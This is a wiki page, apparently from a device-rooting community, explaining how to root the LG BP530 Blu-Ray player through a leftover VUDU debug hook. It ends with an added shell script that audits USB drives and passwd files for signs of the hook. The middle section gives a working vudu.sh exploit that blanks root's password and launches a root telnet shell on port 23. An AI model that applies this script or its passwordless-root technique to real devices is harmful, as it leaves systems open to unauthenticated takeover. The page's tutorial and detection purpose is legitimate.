LG BP530

From Exploitee.rs
Revision as of 01:22, 7 February 2016 by Resno


"Although the information we release has been verified and shown to work to the best of our knowledge, we can't be held accountable for bricked devices or roots gone wrong."


This page will be dedicated to a general overview, descriptions, and information related to the LG BP530 Blu-Ray player.

Purchase

Buying devices is expensive and, in a lot of cases, our testing leads to bricked equipment. If you would like to help support our group, site, and research, please use one of the links below to purchase your next device.

Purchase the LG BP530 Blu-Ray Player at Amazon

GPL

You can find GPL code for the LG BP530 here.

Exploitation

A bug exists in the MTK-supplied SDK which affects many Blu-Ray players, including the BP530. The main binary, which controls all aspects of the player, has leftover debug instructions for the VUDU app. When the VUDU app is run, if a file named "vudu.txt" exists in a directory named "vudu" on a FAT-formatted flash drive, the player attempts to execute "vudu/vudu.sh" and deletes vudu.txt. The script runs as root. Using the commands below, you can spawn a root telnet shell, allowing access to the device:

  • Create a folder named "vudu" on a FAT-formatted flash drive.
  • Inside that folder, create a blank file named "vudu.txt".
  • Also in that folder, create a file named "vudu.sh" containing the following:
#!/bin/sh

echo "executing" > /mnt/sda1/vudu.txt
mount -t overlayfs -o overlayfs /etc/passwd
echo "root::0:0:root:/root:/bin/sh" > /etc/passwd

/mnt/rootfs_normal/usr/sbin/telnetd

  • Start the player with the flash drive plugged in, and launch the VUDU app. The script is executed, and a telnet shell now exists for you to connect to on port 23 as root. Following this, you will be brought back to the main menu.
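
The debug hook described above leaves recognisable artefacts: the "vudu" trigger layout on removable media and a root entry with an empty password field in /etc/passwd. The following audit script is an added example, not part of the original page or the vendor's code; the function names (ci_lookup, drive_status, empty_password_accounts) and the way the script is invoked are assumptions made for illustration.

```sh
#!/bin/sh
# Added example: audit a USB drive and a passwd file for the artefacts of
# the vudu.sh debug hook. Not code from the original page.

# Echo the first entry named $2 directly under directory $1.
# FAT is case-insensitive, so the name is matched case-insensitively.
ci_lookup() {
    find "$1" -mindepth 1 -maxdepth 1 -iname "$2" 2>/dev/null | head -n 1
}

# Classify a mounted drive ($1 = mount point):
#   armed        vudu/vudu.txt and vudu/vudu.sh both present (hook will fire)
#   script-only  vudu/vudu.sh present, flag file absent (the player deletes
#                vudu.txt when the hook runs, so this can mean it already fired)
#   clean        no vudu/vudu.sh found
drive_status() {
    dir=$(ci_lookup "$1" vudu)
    [ -n "$dir" ] && [ -d "$dir" ] || { echo clean; return; }
    script=$(ci_lookup "$dir" vudu.sh)
    flag=$(ci_lookup "$dir" vudu.txt)
    if [ -n "$script" ] && [ -n "$flag" ]; then
        echo armed
    elif [ -n "$script" ]; then
        echo script-only
    else
        echo clean
    fi
}

# Print account names in passwd file $1 whose password field is empty,
# such as the "root::0:0:root:/root:/bin/sh" line the script writes.
empty_password_accounts() {
    awk -F: '!/^#/ && NF >= 7 && $2 == "" { print $1 }' "$1"
}

# Usage: sh audit.sh <usb-mountpoint> [passwd-file]
if [ "$#" -ge 1 ]; then
    echo "drive: $(drive_status "$1")"
    if [ -n "${2:-}" ]; then
        empty_password_accounts "$2" | sed 's/^/empty password: /'
    fi
fi
```

A drive reported as "armed" should not be inserted into an affected player, and any account listed with an empty password on a device that also exposes telnet on port 23 indicates the hook has been used.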